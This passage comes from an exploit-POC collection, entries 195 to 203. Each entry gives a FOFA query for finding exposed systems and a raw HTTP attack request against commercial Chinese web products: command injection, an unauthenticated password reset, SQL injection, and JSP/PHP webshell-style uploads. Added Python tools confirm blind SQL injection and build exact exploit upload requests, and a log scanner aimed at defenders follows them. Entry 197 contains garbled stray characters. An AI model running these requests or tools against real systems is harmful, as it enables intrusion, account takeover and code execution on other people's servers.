Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星 internet behaviour management system send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
The name field of the JSON body is not sanitised; the POC injects ";uname -a;echo ":
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
xgh is the account identifier and newPass the password to set; no credentials are presented:
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入& p& t7 X% _& k* `7 A/ B& @& ]: B
FOFA:app="浙大恩特客户资源管理系统"# T8 |6 O: O  t- k
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1# a& Y( V- s% ?$ K' g: ~
Host:
6 \# {$ U( K$ B( a( p: ?% ~1 sUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36$ y: O' N! _/ G
Accept-Encoding: gzip, deflate( Y" e2 X+ _' I' i) L
Connection: close! k( z( q3 m9 L( I/ ^# U. v; H

+ i! n( g1 Y- z# _+ }  I6 N0 n( N' {, t+ r

198. 阿里云盘 (Aliyun Drive) WebDAV command injection
CVE-2024-29640
The sid value decodes to `ls />/www/aaa.txt` (backtick substitution), writing the listing to /www/aaa.txt; the request carries a LuCI sysauth session cookie:
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Host: your-ip
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. Cockpit assetsmanager/upload file upload
FOFA:title="Authenticate Please!"
Step 1: request the login page; the response body carries the csfr token needed for the login call:
GET /auth/login?to=/ HTTP/1.1
Host: your-ip

Response: 200, containing csfr:"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw" (the value differs per instance)

Step 2: log in with the admin/admin credentials the POC uses and the token from step 1 to obtain a session cookie:
POST /auth/check HTTP/1.1
Host: your-ip
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3: upload with that cookie. The payload deletes itself on first execution, so the check leaves nothing behind:
POST /assetsmanager/upload HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

Uploaded file path: /storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA:app="海洋CMS"
Time-based blind injection in id (MySQL syntax, 5 second delay):
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Host: your-ip
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) omnimedia news editing system binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
The TableName parameter is concatenated into the query (SQL Server syntax, 5 second delay):
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

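Several of the injections in this list (the processAsyncObject, deleteStudy, NavigationAjax, dmku and binary.do entries) are confirmed only by a SLEEP(5) or WAITFOR DELAY '0:0:5' round-trip. The script below is an added example, not part of the original collection or of any vendor's code: it times a benign value against the delay payload over several interleaved rounds and reports a hit only when the baseline is fast and the gap is close to the requested delay, which rules out a slow backend or a proxy timeout being read as a positive. make_get_sender, and the parameter name you hand it, are illustrative assumptions; SimulatedTarget is a constructed stand-in so the check runs offline.

```python
"""Timing-based confirmation for the blind SQL injections above.

One request that "takes about five seconds" is weak evidence: a slow
backend, a WAF tarpit or a proxy timeout looks the same. This interleaves
benign and delay-payload requests, compares medians, and only reports the
parameter as injectable when the baseline is fast and the difference is
close to the requested delay.
"""
import re
import statistics
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict


def build_payload(dialect: str, seconds: int) -> str:
    """Delay payloads in the two shapes used above: MySQL (entries 187, 200)
    and SQL Server (entries 189, 191, 201)."""
    if dialect == "mysql":
        return f"(select(0)from(select(sleep({seconds})))v)"
    if dialect == "mssql":
        return f"1';WAITFOR DELAY '0:0:{seconds}'--"
    raise ValueError(f"unknown dialect {dialect!r}")


def confirm_time_based(send: Callable[[str], None], benign: str, delayed: str,
                       delay_s: float, rounds: int = 3,
                       clock: Callable[[], float] = time.monotonic) -> Dict[str, object]:
    """Send `benign` and `delayed` alternately `rounds` times, timing each with
    `clock`, and decide from the medians. An endpoint whose baseline is already
    near the delay is rejected rather than counted as a hit."""
    def timed(value: str) -> float:
        start = clock()
        send(value)
        return clock() - start

    baseline, injected = [], []
    for _ in range(rounds):
        baseline.append(timed(benign))
        injected.append(timed(delayed))
    base_med = statistics.median(baseline)
    inj_med = statistics.median(injected)
    delta = inj_med - base_med
    vulnerable = base_med < delay_s / 2 and delta >= 0.8 * delay_s
    return {"baseline_median": base_med, "injected_median": inj_med,
            "delta": delta, "vulnerable": vulnerable}


def make_get_sender(url: str, param: str, timeout: float = 30.0) -> Callable[[str], None]:
    """Real transport (assumed shape): GET `url` with `param` set to the value
    under test. Errors, including timeouts, are swallowed because only the
    elapsed time matters; keep `timeout` above the delay you request."""
    def send(value: str) -> None:
        full = url + ("&" if "?" in url else "?") + urllib.parse.urlencode({param: value})
        try:
            with urllib.request.urlopen(full, timeout=timeout) as resp:
                resp.read()
        except Exception:
            pass
    return send


class SimulatedTarget:
    """Constructed stand-in for a target so the check runs offline: a virtual
    clock that advances by a fixed latency per request, plus the requested
    number of seconds when the value carries a SLEEP()/WAITFOR DELAY payload
    and the simulated backend is injectable."""

    def __init__(self, injectable: bool, base_latency: float = 0.3):
        self.injectable = injectable
        self.base_latency = base_latency
        self.now = 0.0

    def clock(self) -> float:
        return self.now

    def send(self, value: str) -> None:
        self.now += self.base_latency
        m = re.search(r"sleep\((\d+)\)|waitfor delay '0:0:(\d+)'", value.lower())
        if self.injectable and m:
            self.now += float(m.group(1) or m.group(2))


if __name__ == "__main__":
    # Offline demo against the simulator; swap in make_get_sender(...) for a real target.
    target = SimulatedTarget(injectable=True)
    result = confirm_time_based(target.send, "1", build_payload("mssql", 5),
                                delay_s=5, rounds=3, clock=target.clock)
    print(result)
```

For a live check, build the sender from the entry's own request, for instance make_get_sender("http://your-ip/xds/deleteStudy.php", "documentUniqueId") for entry 189, and keep the delay short enough that repeated rounds do not tie up the target's worker pool.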
202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Step 1: fetch the page to obtain the current __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2: substitute those values for {{__VIEWST​ATE}} and {{__EVENTVALIDATION}} and submit the upload form:
POST /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

{{__VIEWSTATE}}
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

{{__EVENTVALIDATION}}
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

Uploaded file path: /_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA:body="RedseaPlatform"
The fj_file part is stored with its original .jsp name even though it is declared as image/jpeg:
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
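The multipart requests in entries 194, 199, 202 and 203 only work if the boundary lines, the CRLF framing and Content-Length agree exactly, and copied POCs routinely break one of the three. The builder below is an added example, not tooling from the original post or from any of the listed vendors: it assembles the body first and derives Content-Length from it, reproduces the PtFjk request from entry 203 byte for byte (including the "Content-Type:image/jpeg" line with no space after the colon, which is what the published length of 210 corresponds to), and builds entry 199's two-part body. The host and port you pass, and the send_raw helper, are illustrative assumptions.

```python
"""Byte-exact multipart/form-data requests for the upload entries (194, 199, 202, 203).

Hand-edited POCs often carry a Content-Length that no longer matches the
body, and the CRLF framing of a multipart body is easy to mangle when it is
copied around. Building the body first and computing Content-Length from it
removes both problems.
"""
import socket
from typing import Iterable, Mapping, Sequence, Tuple

CRLF = b"\r\n"


def build_multipart(boundary: str, parts: Iterable[Mapping[str, object]]) -> bytes:
    """Each part: 'name', 'value' (str or bytes), optional 'filename', and
    optional 'headers' (extra header lines written verbatim after the
    Content-Disposition line)."""
    out = bytearray()
    for part in parts:
        out += b"--" + boundary.encode() + CRLF
        disposition = f'Content-Disposition: form-data; name="{part["name"]}"'
        if "filename" in part:
            disposition += f'; filename="{part["filename"]}"'
        out += disposition.encode() + CRLF
        for line in part.get("headers", ()):
            out += str(line).encode() + CRLF
        out += CRLF
        value = part["value"]
        out += (value.encode() if isinstance(value, str) else bytes(value)) + CRLF
    out += b"--" + boundary.encode() + b"--" + CRLF
    return bytes(out)


def build_request(method: str, path: str, headers: Sequence[Tuple[str, str]], body: bytes) -> bytes:
    """Serialise a request; Content-Length is computed, never typed by hand."""
    lines = [f"{method} {path} HTTP/1.1"]
    lines += [f"{k}: {v}" for k, v in headers]
    lines.append(f"Content-Length: {len(body)}")
    return CRLF.join(line.encode() for line in lines) + CRLF + CRLF + body


PTFJK_BOUNDARY = "----WebKitFormBoundaryt7WbDl1tXogoZys4"
COCKPIT_BOUNDARY = "---------------------------36D28FBc36bd6feE7Fb3"


def ptfjk_request(host: str) -> bytes:
    """Entry 203, reproduced from the listing above."""
    body = build_multipart(PTFJK_BOUNDARY, [{
        "name": "fj_file", "filename": "11.jsp",
        "headers": ["Content-Type:image/jpeg"],  # as published: no space after the colon
        "value": '<% out.print("hello,eHR");%>',
    }])
    return build_request("POST", "/RedseaPlatform/PtFjk.mob?method=upload", [
        ("Host", host), ("Accept-Encoding", "gzip"), ("User-Agent", "Mozilla/5.0"),
        ("Content-Type", f"multipart/form-data; boundary={PTFJK_BOUNDARY}"),
    ], body)


def cockpit_upload_body() -> bytes:
    """Entry 199's two-part body: the self-deleting PHP file plus an empty 'folder' field."""
    return build_multipart(COCKPIT_BOUNDARY, [
        {"name": "files[]", "filename": "tttt.php", "headers": ["Content-Type: text/php"],
         "value": '<?php echo "tttt";unlink(__FILE__);?>'},
        {"name": "folder", "value": ""},
    ])


def send_raw(host: str, port: int, request: bytes, timeout: float = 10.0) -> bytes:
    """Deliver the exact bytes over a plain socket (so no HTTP client rewrites
    the framing) and read until the server closes or the read times out."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        try:
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        except socket.timeout:
            pass
    return b"".join(chunks)


if __name__ == "__main__":
    print(ptfjk_request("x.x.x.x").decode())
```

Sending through a library client (requests, curl with -F) re-encodes the parts with its own boundary and headers, which is fine for the vulnerability but not for reproducing a specific captured request; send_raw is for the latter.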
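The collection is published so that defenders can check their own exposure, so here is the log-side counterpart as an added example, not code from the original post or from any of the listed vendors: a scanner over combined-format access-log lines that flags the endpoints named in entries 187 to 203 and the payload shapes that recur across them, after decoding and normalising the request target so that the /js/../ prefix in entry 191 and the ;.js suffix in entry 197 do not slip past a plain string match. It generalises the individual entries into one ruleset; the sample log lines are constructed, not real traffic, and the rule names are this example's own.

```python
"""Access-log triage for the requests in this collection (entries 187 to 203).

Parse combined-format access-log lines, decode and normalise the request
target, and flag hits on the endpoints named in the entries plus the
generic payload shapes that recur across them. Normalisation is not
optional: entry 191 reaches NavigationAjax through
/CDGServer3/js/../NavigationAjax and entry 197 appends ;.js to the servlet
path, so a substring match on the raw line misses both.
"""
import posixpath
import re
from typing import Dict, List
from urllib.parse import unquote, unquote_plus

# Endpoint paths taken from the entries, keyed by normalised path.
KNOWN_ENDPOINTS: Dict[str, str] = {
    "/index.cfm/_api/json/v1/default": "187",
    "/attachment": "188",
    "/xds/deleteStudy.php": "189",
    "/index.php/admin/Userinfo/poihuoqu": "190",
    "/CDGServer3/NavigationAjax": "191",
    "/JoinfApp/EMail/UploadEmailAttr": "192",
    "/master/ajaxActions/setSystemTimeAction.php": "193",
    "/servlet/uploadAttachmentServlet": "194",
    "/send_order.cgi": "195",
    "/cas/userCtl/resetPasswordBySuper": "196",
    "/entsoft/Quotegask_editAction.entweb": "197",
    "/cgi-bin/luci/admin/services/aliyundrive-webdav/query": "198",
    "/assetsmanager/upload": "199",
    "/js/player/dmplayer/dmku": "200",
    "/newsedit/newsplan/task/binary.do": "201",
    "/User/AccountEdit.aspx": "202",
    "/RedseaPlatform/PtFjk.mob": "203",
}

# Payload shapes seen in the query strings above, matched on the decoded target.
PAYLOAD_RULES = [
    ("sqli-time-based", re.compile(r"sleep\s*\(\s*\d+\s*\)|waitfor\s+delay", re.I)),
    ("sqli-union", re.compile(r"union\s+(?:all\s+)?select", re.I)),
    ("file-read", re.compile(r"(?:file|poi)=(?:file://)?/etc/", re.I)),
    ("cmd-injection", re.compile(r"`[^`]+`|;\s*(?:uname|ls|cat|echo)\b|os\.system\(", re.I)),
    ("upload-exec-ext", re.compile(r"[?&](?:name|filename)=[^&\s]*\.(?:ashx|jsp|php)\b", re.I)),
]

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
)


def normalise_path(target: str) -> str:
    """Path component only, percent-decoded twice, ;params stripped per
    segment, then dot-segments collapsed."""
    path = unquote(unquote(target.split("?", 1)[0]))
    path = "/".join(seg.split(";", 1)[0] for seg in path.split("/"))
    return posixpath.normpath(path)


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """One finding per (line, rule); lines that are not access-log records are skipped."""
    findings: List[Dict[str, object]] = []
    for number, line in enumerate(lines, start=1):
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalise_path(m["target"])
        decoded = unquote_plus(m["target"])
        hits = []
        if path in KNOWN_ENDPOINTS:
            hits.append("endpoint-" + KNOWN_ENDPOINTS[path])
        hits += [rule for rule, rx in PAYLOAD_RULES if rx.search(decoded)]
        for rule in hits:
            findings.append({"line": number, "ip": m["ip"], "method": m["method"],
                             "path": path, "rule": rule})
    return findings


# Constructed sample lines (not real traffic) echoing entries 188, 189, 191, 197 and 198, plus one benign request.
SAMPLE_LOG = """\
203.0.113.5 - - [05/Jun/2024:07:41:00 +0000] "GET /attachment?file=/etc/passwd HTTP/1.1" 200 1892 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:07:41:02 +0000] "GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1" 200 12 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:07:41:09 +0000] "POST /CDGServer3/js/../NavigationAjax HTTP/1.1" 200 45 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:07:41:11 +0000] "GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1%27)+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1" 200 3 "-" "Mozilla/5.0"
203.0.113.5 - - [05/Jun/2024:07:41:15 +0000] "GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [05/Jun/2024:07:42:00 +0000] "GET /index.php?id=7 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG.splitlines()):
        print(f"line {f['line']}: {f['ip']} {f['method']} {f['path']} -> {f['rule']}")
```

POST bodies never reach the access log, so the upload and RCE entries (190, 192 to 196, 199, 201 to 203) are only caught here by endpoint, which is why the endpoint table is kept separate from the payload rules: an endpoint hit says "someone is probing this product", a payload hit says "and this is the attack".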